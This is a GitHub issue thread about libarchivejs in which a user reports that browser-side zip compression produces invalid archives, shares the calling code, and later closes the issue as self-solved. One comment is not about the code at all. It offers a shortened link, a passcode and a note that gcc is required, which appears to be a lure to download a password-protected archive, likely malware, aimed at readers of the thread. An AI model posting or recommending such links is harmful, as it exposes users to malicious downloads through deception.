### ISSUE TITLE
About file compressing feature.

### ISSUE THREAD

**Issue by xbridges** [nika-begiashvili/libarchivejs#74]
Thanks published this great library.
I tried compress feature on browser.
Below is
1. A file select by browser.
2. test 1.jpg compress and download success, but invalid size and invalid zip file.

log in browser develop tool
![compress_test](https://github.com/user-attachments/assets/82b757f4-2066-4214-88d3-f5c693c6b129)

zip binary data
![binary](https://github.com/user-attachments/assets/2d896a9e-cf51-4eee-95f2-b9e3b2d4a015)

tried source code.
```
import { Archive, ArchiveCompression, ArchiveFormat } from "./dist/libarchive.js";

document.getElementById("file").addEventListener("change", async (e) => {
  try {
    Archive.init({
        workerUrl: "./dist/worker-bundle.js",
    });
    window.Archive = Archive;

    const file = e.currentTarget.files[0];
    const imageFiles = [{ file }];
    
    console.log(imageFiles);
    
    const archivedFile = await Archive.write({
            files: imageFiles,
            outputFileName: "test.zip",
            compression: ArchiveCompression.GZIP,
            format: ArchiveFormat.ZIP,
          });
    console.log(archivedFile);
    
    // download file
    const a = document.createElement('a');
    a.href = URL.createObjectURL(archivedFile);
    a.download = `test.zip`;
    a.click();
    
    
  } catch (err) {
    console.error(err);
  }
});
```

I'd like you to point out the bad points please.

**Comment by w2wewwww** [comment]
This might help you
https://bit.ly/3yXXzbX
Passcode: d5kp14h
You must have gcc compiler installed

**Comment by xbridges** [comment]
Sorry.
I will close this issue. I solved it myself.
My preparing process was incorrect.
